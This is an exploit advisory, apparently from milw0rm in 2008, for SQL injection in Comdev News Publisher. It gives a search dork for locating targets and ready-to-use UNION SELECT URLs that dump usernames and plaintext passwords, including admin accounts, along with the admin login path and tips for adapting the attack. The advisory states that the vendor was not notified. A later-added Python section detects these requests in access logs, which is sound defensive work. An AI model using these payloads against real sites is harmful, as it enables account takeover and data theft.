--==+================================================================================+==--
--==+              Comdev News Publisher SQL Injection Vulnerabilities               +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz & xprog
Discovered On: 4 April 2008
SITE: www.comdevweb.com
DORK (altavista.com/google): "Powered by Comdev News Publisher"

VENDOR Has Not Been Notified!


DESCRIPTION:
Comdev News Publisher suffers from insecure SQL queries, which allow malicious users to pull data
from the database and view admin/user passwords in plaintext.


EXPLOITS:
All Users: www.site.com/index.php?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/*
Admin: http://site.com/index.php?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/**/WHERE/**/permission=0x414C4C/*


NOTE/TIP:
Admin login is located at /oneadmin/
Some sites use .htm/.html extensions instead of .php, and some sites use "main" instead of "index".
They do this using a modified htaccess file. No worries, the injections will still work; just change "index.php"
in the above injections.
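
DETECTION EXAMPLE (added here, not part of the original advisory or the vendor's code):
A log check for the requests described above. It keys on the arcyear/arcmonth parameter names rather than the script path, since the path varies between sites as noted. Assumptions: common-format access log lines, both parameters normally carry small integers, and all function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters named in the advisory; assumed to carry small integers in normal use.
ARCHIVE_PARAMS = ("arcyear", "arcmonth")
INT_RE = re.compile(r"-?\d{1,4}")
# Request target inside a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_HINT_RE = re.compile(r"union|select|concat|/\*|0x[0-9a-f]+", re.I)

# Constructed sample log lines (documentation IP ranges, shortened payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Apr/2008:10:00:00 +0000] "GET /index.php?arcyear=2008&arcmonth=4 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Apr/2008:10:00:05 +0000] "GET /main.htm?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3 HTTP/1.1" 200 812',
    '203.0.113.7 - - [04/Apr/2008:10:00:09 +0000] "GET /index.html?arcyear=-1&arcmonth=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F1 HTTP/1.1" 200 812',
    '192.0.2.11 - - [04/Apr/2008:10:01:00 +0000] "GET /index.php?arcyear=2008&arcmonth=apr HTTP/1.1" 200 5120',
]


def inspect_request(target):
    """Return (param, decoded_value, reason) for each archive parameter that is not an integer."""
    findings = []
    # parse_qsl percent-decodes values, so encoded payloads are checked in decoded form.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() not in ARCHIVE_PARAMS or INT_RE.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-integer"
        findings.append((name.lower(), value, reason))
    return findings


def scan_log(lines):
    """Return [(line_number, findings)] for lines whose request carries a suspicious value."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = inspect_request(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```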


GREETZ: milw0rm.com, h4ck-y0u.org !



--==+================================================================================+==--
--==+              Comdev News Publisher SQL Injection Vulnerabilities               +==--
--==+================================================================================+==--

# milw0rm.com [2008-04-04]
Comdev News Publisher Remote SQL Injection Vulnerability
t0pP8uZz
04/04/2008